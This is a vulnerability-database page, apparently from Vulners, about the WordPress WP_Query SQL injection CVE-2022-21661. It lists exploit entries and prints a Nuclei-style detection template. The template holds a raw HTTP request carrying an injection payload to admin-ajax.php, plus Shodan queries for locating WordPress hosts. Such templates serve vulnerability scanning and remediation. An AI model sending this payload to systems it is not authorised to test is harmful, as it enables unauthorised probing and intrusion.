| Reporter | Title | Published | Views | Family All 70 |
|---|---|---|---|---|
| WordPress Core 5.8.2 - (WP_Query) SQL Injection Vulnerability | 13 Jan 202200:00 | – | zdt | |
| Exploit for SQL Injection in Wordpress | 28 Jul 202213:12 | – | githubexploit | |
| Exploit for SQL Injection in Wordpress | 27 Apr 202300:36 | – | githubexploit | |
| Exploit for SQL Injection in Wordpress | 31 Jul 202211:53 | – | githubexploit | |
| Exploit for SQL Injection in Wordpress | 24 Mar 202407:03 | – | githubexploit | |
| Exploit for SQL Injection in Wordpress | 13 May 202506:20 | – | githubexploit | |
| Exploit for SQL Injection in Wordpress | 8 Feb 202304:58 | – | githubexploit | |
| Exploit for SQL Injection in Wordpress | 13 Jan 202313:31 | – | githubexploit | |
| Exploit for SQL Injection in Wordpress | 4 Jan 202415:49 | – | githubexploit | |
| Exploit for SQL Injection in Wordpress | 12 Nov 202413:23 | – | githubexploit |
id: CVE-2022-21661
info:
name: WordPress <5.8.3 - SQL Injection
author: Marcio Mendes
severity: high
description: |
WordPress before 5.8.3 is susceptible to SQL injection through multiple plugins or themes due to improper sanitization in WP_Query, An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation, or data leakage.
remediation: This has been patched in 5.8.3. Older affected versions are also fixed via security release, that go back till 3.7.37. We strongly recommend that you keep auto-updates enabled. There are no known workarounds for this vulnerability.
reference:
- https://wpscan.com/vulnerability/7f768bcf-ed33-4b22-b432-d1e7f95c1317
- https://www.zerodayinitiative.com/blog/2022/1/18/cve-2021-21661-exposing-database-info-via-wordpress-sql-injection
- http://packetstormsecurity.com/files/165540/WordPress-Core-5.8.2-SQL-Injection.html
- https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-6676-cqfm-gw84
- https://nvd.nist.gov/vuln/detail/cve-2022-21661
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2022-21661
cwe-id: CWE-89
epss-score: 0.97795
epss-percentile: 0.99897
cpe: cpe:2.3:a:wordpress:wordpress:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: wordpress
product: wordpress
shodan-query:
- cpe:"cpe:2.3:a:wordpress:wordpress"
- http.component:"wordpress"
tags: cve2022,cve,wp,sqli,wpquery,wpscan,packetstorm,wordpress,vkev,vuln
http:
- raw:
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=ecsload&query={"tax_query":{"0":{"field":"term_taxonomy_id","terms":[""]}}}&ecs_ajax_settings={"post_id":"1", "current_page":1, "widget_id":1, "theme_id":1, "max_num_pages":10}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains(body, "WordPress database error:")'
- 'contains(body, "error in your SQL syntax")'
condition: and
# digest: 4b0a0048304602210093921b55ae3a53e17b4c624b0f1fe40f200afbb300ac1042d089a6b6a4a0ed26022100bcd3d2c21fe086ee465664741e7d14e36a9ade735584798fea2a85d17d1d1dbc:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation